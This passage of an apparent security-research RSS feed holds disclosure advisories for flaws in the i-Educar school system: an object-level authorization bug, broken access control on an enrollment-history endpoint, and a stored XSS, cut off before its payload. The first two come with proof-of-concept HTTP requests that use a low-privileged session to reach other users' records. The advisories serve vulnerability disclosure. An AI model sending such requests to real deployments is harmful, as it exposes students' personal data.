&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Avaliacao/diarioApi?&amp;amp;amp;resource=matriculas&amp;amp;amp;oper=get&amp;amp;amp;instituicao_id=1&amp;amp;amp;escola_id=3&amp;amp;amp;curso_id=4&amp;amp;amp;serie_id=undefined&amp;amp;amp;turma_id=3&amp;amp;amp;ano_escolar=2025&amp;amp;amp;componente_curricular_id=11&amp;amp;amp;etapa=1&amp;amp;amp;matricula_id=12&amp;amp;amp;busca=S&amp;amp;amp;mostrar_botao_replicar_todos=1&amp;amp;amp;ano=2025&amp;amp;amp;ref_cod_instituicao=1&amp;amp;amp;ref_cod_escola=3&amp;amp;amp;ref_cod_curso=4&amp;amp;amp;ref_cod_serie=6&amp;amp;amp;ref_cod_turma=3&amp;amp;amp;etapa=1&amp;amp;amp;ref_cod_componente_curricular=11&amp;amp;amp;ref_cod_matricula=12&amp;amp;amp;navegacao_tab=2 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/Avaliacao/diario?&amp;amp;amp;resource=matriculas&amp;amp;amp;oper=get&amp;amp;amp;instituicao_id=1&amp;amp;amp;escola_id=3&amp;amp;amp;curso_id=4&amp;amp;amp;serie_id=undefined&amp;amp;amp;turma_id=3&amp;amp;amp;ano_escolar=2025&amp;amp;amp;componente_curricular_id=11&amp;amp;amp;etapa=1&amp;amp;amp;matricula_id=12
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: educar_session=[low-privileged-session]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10607/image-2.png&amp;#34;
	width=&amp;#34;1437&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10607/image-2_hu_b84de71ce4393634.png 480w, /p/cve-2025-10607/image-2_hu_47595ad6e39df54f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;213&amp;#34;
		data-flex-basis=&amp;#34;512px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that informations about classes were returned.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive PII;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Violation of data protection laws (e.g., LGPD, GDPR);&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential abuse of user data or impersonation;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;User enumeration.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10608</title>
        <link>https://www.cvehunters.com/p/cve-2025-10608/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10608/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10608-broken-access-control-in-enrollment-historyid-endpoint&amp;#34;&amp;gt;CVE-2025-10608: Broken Access Control in &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enrollment-history/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10608-broken-access-control-in-enrollment-historyid-endpoint&amp;#34;&amp;gt;CVE-2025-10608: Broken Access Control in &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enrollment-history/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10608/image.png&amp;#34;
	width=&amp;#34;1439&amp;#34;
	height=&amp;#34;663&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10608/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10608/image_hu_ecdded4f672254a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;217&amp;#34;
		data-flex-basis=&amp;#34;520px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10608/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10608/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10608/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /enrollment-history/206 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that we have access to the page and to the function to sign students from classes. And, this user, should not do that.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10608/image-2.png&amp;#34;
	width=&amp;#34;1617&amp;#34;
	height=&amp;#34;702&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10608/image-2_hu_2bddda474495b951.png 480w, /p/cve-2025-10608/image-2_hu_ff39a09242bf73ba.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;230&amp;#34;
		data-flex-basis=&amp;#34;552px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10372</title>
        <link>https://www.cvehunters.com/p/cve-2025-10372/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10372/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10372-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_modulo_cadphp&amp;#34;&amp;gt;CVE-2025-10372: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_modulo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10372-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_modulo_cadphp&amp;#34;&amp;gt;CVE-2025-10372: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10372&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_modulo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_modulo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
